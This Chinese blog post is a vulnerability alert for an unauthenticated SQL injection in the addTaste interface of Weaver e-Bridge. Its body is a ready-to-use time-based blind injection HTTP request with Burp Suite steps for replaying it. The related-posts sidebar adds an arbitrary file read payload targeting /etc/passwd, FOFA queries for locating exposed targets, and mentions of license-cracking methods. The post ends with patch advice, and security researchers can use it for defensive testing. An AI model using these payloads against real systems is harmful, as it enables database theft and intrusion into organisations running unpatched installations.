漏洞情报-泛微云桥 e-Bridge addTaste接口SQL注入漏洞

已于 2024-01-09 10:13:01 修改
阅读量649 收藏 7
点赞数 8
分类专栏: 不秃头的安全 文章标签: web安全 网络安全 网络
于 2024-01-02 15:40:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52612931/article/details/135342089
版权

微信公众号:不秃头的安全

漏洞详情:

泛微云桥e-Bridge OA是一种基于云计算和移动互联网技术的企业办公自动化(OA)解决方案。它由中国的企业软件开发公司泛微软件开发,旨在帮助企业实现高效的办公管理和协同工作。由于泛微云桥e-Bridge平台addTaste接口存在SQL注入漏洞,未经身份认证的攻击者可以利用该漏洞获取数据库权限及数据库的敏感数据。

影响范围

泛微云桥 e-Bridge <= v9.5 20220113

漏洞利用

GET /taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(9-(IF(18015%3e3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Cookie:EBRIDGE_JSESSIONID=CAE1276AE2279FD98B96C54DE624CD18;slsession=BmCjG8ZweGWzoSGpQ1QgQg==;EBRIDGE_JSESSIONID=21D2D790531AD7941D060B411FABDC10
Accept-Encoding: gzip
SL-CE-SUID: 25

使用方法:1、打开泛微云桥e-Bridge登录首页,使用BurpSuite拦截请求包
2、将抓到的请求包进行修改,将GET内容修改为POC的GET:/taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(9-(IF(18015%3e3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX HTTP/1.1
3、其他内容不修改,然后放包后即可复现。漏洞修复建议目前官方已发布安全更新,受影响用户可通过官网安装补丁更新。官方下载地址:https://www.weaver.com.cn/subpage/aboutus/news/news-detail.html?id=934

不秃头的安全
关注
  • 8
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
泛微-云桥e-Bridge SQL注入漏洞复现
0xSec
12-12 1398
由于泛微-云桥e-Bridge平台/taste/addTaste接口处存在SQL注入漏洞,未经身份认证的攻击者可以通过此漏洞获取数据库权限,获取用户密码等重要凭据,使系统处于极不安全状态。
泛微云桥e-Bridge安装手册
weixin_34239169的博客
05-27 3190
有时候不看官方文档进行配置,可能会出现奇奇怪怪的问题,SO转载一下官方文档,顺带学习。 想超长体验此软件,请搜索本博客内容,有破解方法,仅用来学习使用,顺带进行二次开发,请勿使用在商业用途,谢谢。 泛微云桥e-Bridge安装手册 一、 概述 泛微云桥(e-Bridge)是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信...
泛微云桥e-Bridge-任意文件读取漏洞
chaojixiaojingang
10-09 6407
1.资产查找 Fofa: title="泛微云桥 e-Bridge" 2.漏洞描述 泛微云桥e-Bridge存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。 3.漏洞复现 1)Linux服务器 (1)在URL后添加payload payload:/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt (2)在URL后添加/file/fileNo
漏洞复现-泛微云桥 e-Bridge SQL注入(附漏洞检测脚本)
jjjj1029056414的博客
12-12 1255
漏洞复现-泛微云桥 e-Bridge SQL注入,附带自己写的poc脚本
【复现】泛微云桥 e-Bridge SQL注入漏洞_45
fushuang333的博客
02-10 898
【复现】泛微云桥 e-Bridge SQL注入漏洞,攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
泛微云桥任意文件读取漏洞复现[09/18]
weixin_39811856的博客
09-18 1356
1.老规矩,搜寻目标机器(xpath用起来确实很方便) 2.根据网上的POC试试: GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1 User-Agent: curl/7.29.0 Host: xxxxx Accept: */* 3.根据收集到的IP,手动是真滴麻烦,写个小脚本再筛选一遍: 发现这个好像有戏,没有/etc/passwd,并且还是
泛微云桥 e-Bridge 任意文件读取.md
04-11
泛微云桥 e-Bridge 任意文件读取
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
泛微E-Office10远程代码执行漏洞
最新发布
05-06
泛微E-Office 10确实存在远程代码执行漏洞,这个漏洞**可能导致严重的安全后果**。 该漏洞的关键在于系统处理上传的PHAR文件时存在的缺陷。攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的...
泛微e-cology与企业微信集成配置手册2017V1.0
10-29
泛微e-Bridge,又称云桥,是泛微软件提供的一个关键组件,它最初作为微信和钉钉集成平台,但现在主要关注企业微信的整合。 **一、泛微e-Bridge:核心桥梁** 1. **e-Bridge的角色**:e-Bridge泛微协同办公系统与...
2021-泛微OA V8 SQL注入漏洞
热门推荐
weixin_43227251的博客
04-13 1万+
泛微OA V8 SQL注入漏洞 漏洞描述 泛微OA V8 存在SQL注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限 漏洞影响 泛微OA V8 FOFA app=“泛微-协同办公OA” 漏洞复现 在getdata.jsp中,直接将request对象交给 weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext) : 方法处理 在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法 P
泛微e-Bridge未授权文件读取漏洞复现
The current road is different, love needs to distinguish between right and wrong
03-05 7465
简介 泛微云桥 e-Bridge 存在未经授权读取任意文件漏洞,可利用该漏洞,实现任意文件读取,获取敏感信息。 fofa title="泛微云桥e-Bridge" 漏洞复现 因为不是在本地搭建的漏洞复现环境,利用空间搜索引擎只找到很少量存在漏洞的网站,大多数都开启了身份验证,找到的也都是基于Windows的,所以就不在介绍Linux上搭建的了。 payload1 /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///
记一次泛微漏洞分析到发现未公开新漏洞
weixin_42508548的博客
01-10 3566
本来想着分析分析泛微eoffice最新出的漏洞CNVD-2021-49104的,分析分析着,发现代码好像有别的方法也存在..
泛微云桥知识社区
weixin_34344403的博客
07-06 777
泛微云桥知识社区 https://yq.weaver.com.cn/eb/qa/view/#/subject/25f0cdb1740448d4b46264b304021038网名:浩秦; 邮箱:root#landv.pw; 只要我能控制一個國家的貨幣發行,我不在乎誰制定法律。金錢一旦作響,壞話隨之戛然而止。 ...
泛微 E Bridge 云桥任意文件读取
nnn2188185的博客
03-25 1174
泛微云桥存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。
无胁科技-TVD每日漏洞情报-2022-7-12
wuthreat无胁科技的博客
07-12 805
漏洞名称:Python Flask 框架存在目录穿越漏洞 漏洞级别: 漏洞编号:CVE-2022-31538 相关涉及:Python Flask 漏洞状态:POC 参考链接:https://tvd.wuthreat.com/#/listDetail?TVD_ID=TVD-2022-13976漏洞名称:WP WordPress Opt-in 插件
被动扫描工具(myscan)
lza20001103的博客
08-29 1677
被动扫描工具(myscan) 文章目录被动扫描工具(myscan)前言运行原理演示地址如何运行检测插件优势与不足 前言 myscan是参考awvs的poc目录架构,pocsuite3、sqlmap等代码框架,以及搜集互联网上大量的poc,由python3开发而成的被动扫描工具。 此项目源自个人开发项目,结合个人对web渗透,常见漏洞原理和检测的代码实现,通用poc的搜集,被动扫描器设计,以及信息搜集等思考实践。 运行原理 myscan依赖burpsuite和redis,需启动redis和burpsuite插
泛微云桥e-Bridge 授权破解方法
weixin_34025051的博客
03-15 3980
泛微云桥e-Bridge 授权破解方法,无需更改原有程序,本方法是生成授权文件方式。 已放出授权文件生成源码,破解方法自行看源码理解,再次提示此方法仅用来测试系统使用,如需正式使用请购买正版授权。 其中使用的加密有:MD5,RSA,DES,BASE64。 1 package com.exec; 2 3 import java.io.FileOu...
泛微oa e-cology v9 browser.jsp sql注入漏洞
09-15
泛微OA E-Cology V9是一款常用的企业办公自动化系统,该系统的browser.jsp页面存在SQL注入漏洞SQL注入是一种常见的网络攻击技术,攻击者可以通过构造恶意的SQL语句来绕过系统的认证和授权机制,进而获取敏感数据...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不秃头的安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值